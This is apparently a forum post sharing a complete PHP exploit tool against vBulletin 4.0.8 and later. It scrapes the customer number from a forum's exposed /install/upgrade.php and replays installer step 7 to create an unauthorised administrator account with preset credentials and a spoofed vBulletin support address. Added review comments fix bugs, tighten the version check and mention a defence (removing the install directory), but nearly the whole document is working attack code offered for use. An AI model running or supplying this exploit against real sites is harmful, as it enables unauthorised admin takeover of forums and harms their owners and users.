
Exploit 0day vBulletin >= 4.0.8 by $DoC

Тема в разделе vBulletin, создана пользователем ERROR404, 25 дек 2013.




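    <?php
    // Kept from the original: notices/warnings are swallowed so nothing leaks into
    // the HTML the tool renders. Do not rely on it to mask real errors (the original
    // used an undefined $post that this hid).
    error_reporting(0);

    /*
     * Exploit 0Day vBulletin >= 4.0.8
     * Coded $DoC (@docindetectable)
     * Thanks SuC
     * @bugtraqTeam
     *
     * Reviewer notes (what the code below actually does):
     *  - The whole attack is ONE unauthenticated POST to <forum>/install/upgrade.php,
     *    replaying step 7 of the installer with a chosen admin username/password.
     *    It therefore only works while that installer script is still reachable;
     *    on the defending side, remove the install directory and audit the admin
     *    user table for accounts created this way.
     *  - The customer number (CUSTNUMBER) and the version string are scraped from
     *    the same page; the customer number is replayed both as a POST field and
     *    as the bbcustomerid cookie.
     *  - "OK" only means the POST completed with a non-error HTTP status. Nothing
     *    here verifies that the account was actually created.
     */

    // Config of new admin user added, after exploited
    $newuser = 'supportvb';
    $newpass = 'owned';
    $newmail = 'support@vbulletin.com';

    // Credentials protecting this tool page itself (HTTP Basic).
    $toolUser = 'doc';
    $toolPass = 'vbfucked';

    /**
     * Print the result banner: red ERROR or green OK, then one <label> per line.
     *
     * @param bool  $ok    true for the green OK banner, false for red ERROR
     * @param array $lines detail lines, already HTML-escaped by the caller
     */
    function vbReport($ok, $lines)
    {
        $head = $ok
            ? '<label style="color:green">OK</label>'
            : '<label style="color:red">ERROR</label>';
        echo '<center>' . $head . '<br/><label>' . implode('</label><br/><label>', $lines) . '</label></center>';
    }

    // Constant-time compare so the Basic-auth gate does not leak credential
    // prefixes through timing; a missing header is simply a failed login.
    $authOk = isset($_SERVER['PHP_AUTH_USER'], $_SERVER['PHP_AUTH_PW'])
        && hash_equals($toolUser, (string) $_SERVER['PHP_AUTH_USER'])
        && hash_equals($toolPass, (string) $_SERVER['PHP_AUTH_PW']);

    if (!$authOk)
    {
        header('WWW-Authenticate: Basic realm="Priv8 Script :)"');
        header('HTTP/1.0 401 Unauthorized');
        exit;
    }

    // NOTE(review): the <img> below is loaded from a third-party host by the
    // operator's browser, which discloses the operator's IP/User-Agent to that host.
    ?>
        <html>
            <head>
                <title>Exploit 0Day vBulletin >= 4.0.8</title>
            </head>
            <body>
                <form method='post' action=''>
                    <center>
                    <img src="http://cs11385.vk.me/g24263364/a_1fee9df8.jpg">
                    <br/>
                    <label style='color: red'>vBulletin >= 4.0.8</label>
                    <br/><br/>
                    <label>Forum URL: </label>
                    <br/>
                    <input type="text" name="url">
                    <br/>
                    <input type='submit' name='action' value='EXPLOIT'>
                    </center>
                </form>
            </body>
        </html>
        <?php
        if (isset($_POST['action']))
        {
            // Accept only http(s) targets: file_get_contents() would otherwise open
            // file:// or any other stream wrapper typed into the form. Trailing
            // slashes are dropped so the path below is not doubled ("//install").
            $forum = rtrim(trim((string) $_POST['url']), '/');
            $scheme = strtolower((string) parse_url($forum, PHP_URL_SCHEME));
            if (filter_var($forum, FILTER_VALIDATE_URL) === false || !in_array($scheme, array('http', 'https'), true))
            {
                vbReport(false, array('Not possible exploiting vulnerability.', 'Invalid forum URL.'));
                exit;
            }
            $target = $forum . '/install/upgrade.php';

            // The installer page is the only source of the customer number and the
            // version triple; without it there is nothing to replay.
            $page = file_get_contents($target);
            if ($page === false)
            {
                vbReport(false, array('Not possible exploiting vulnerability.', 'Could not fetch ' . htmlentities($target)));
                exit;
            }

            $customerid = ExtraerFrase('CUSTNUMBER = "', '";', $page);
            $major = ExtraerFrase('vBulletin ', '.', $page);
            $minor = ExtraerFrase('vBulletin ' . $major . '.', '.', $page);
            $patch = ExtraerFrase('vBulletin ' . $major . '.' . $minor . '.', '.', $page);

            // The original gate (`$version1 < 4 && $version3 < 8`) let 4.0.7 and
            // 3.x.9 through and only ran AFTER the POST had been sent. Gate first,
            // on the full x.y.z triple, and treat an unparseable version or a
            // missing customer number as "not possible" (the original also errored
            // when no version string was found).
            $versionKnown = ctype_digit((string) $major) && ctype_digit((string) $minor) && ctype_digit((string) $patch);
            if ($customerid === false || $customerid === '' || !$versionKnown
                || version_compare($major . '.' . $minor . '.' . $patch, '4.0.8', '<'))
            {
                vbReport(false, array('Not possible exploiting vulnerability.'));
                exit;
            }

            // Installer step 7 with the admin-account form pre-filled.
            $fields = array(
                'ajax'                       => '1',
                'version'                    => 'install',
                'checktable'                 => 'false',
                'firstrun'                   => 'false',
                'step'                       => '7',
                'startat'                    => '0',
                'only'                       => 'false',
                'customerid'                 => $customerid,
                'options[skiptemplatemerge]' => '0',
                'response'                   => 'yes',
                'htmlsubmit'                 => '1',
                'htmldata[username]'         => $newuser,
                'htmldata[password]'         => $newpass,
                'htmldata[confirmpassword]'  => $newpass,
                'htmldata[email]'            => $newmail,
            );

            // Keys go out verbatim (the bracketed names are what the installer
            // reads), values url-encoded exactly once, no dangling '&'.
            $pairs = array();
            foreach ($fields as $key => $value)
            {
                $pairs[] = $key . '=' . urlencode($value);
            }
            $body = implode('&', $pairs);

            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $target);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $body);
            curl_setopt($ch, CURLOPT_COOKIESESSION, 1);
            curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid=' . $customerid);
            curl_setopt($ch, CURLOPT_TIMEOUT, 30);
            $result = curl_exec($ch);
            $status = (int) curl_getinfo($ch, CURLINFO_HTTP_CODE);
            $curlError = curl_error($ch);
            curl_close($ch);

            // A transport failure or a 4xx/5xx (e.g. 404 because /install was
            // removed) was reported as "OK" by the original; it is not.
            if ($result === false || $status >= 400)
            {
                $why = $curlError !== '' ? $curlError : 'HTTP ' . $status;
                vbReport(false, array('Not possible exploiting vulnerability.', htmlentities($why)));
                exit;
            }

            // NOTE(review): the page never shows what a successful response looks
            // like, so this "OK" is "request accepted", not "account created".
            // Confirm by logging in with the credentials printed below.
            vbReport(true, array(htmlentities($forum), 'User: ' . $newuser . ' - Pass: ' . $newpass));
        }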
    
    /**
     * Return the text between the first occurrence of $separador1 and the next
     * occurrence of $separador2 after it.
     *
     * Returns false when $separador1 does not occur at all; when $separador2 is
     * absent, everything after $separador1 is returned instead. Byte-based
     * (strpos/substr), which is all the ASCII markers used by the callers need.
     *
     * @param string $separador1 opening marker
     * @param string $separador2 closing marker
     * @param string $cadena     haystack to search
     * @return string|false
     */
    function ExtraerFrase($separador1, $separador2, $cadena) {
        $start = strpos($cadena, $separador1);
        if ($start === false) {
            return false;
        }
        $tail = substr($cadena, $start + strlen($separador1));
        $end = strpos($tail, $separador2);
        return $end === false ? $tail : substr($tail, 0, $end);
    }
    ?>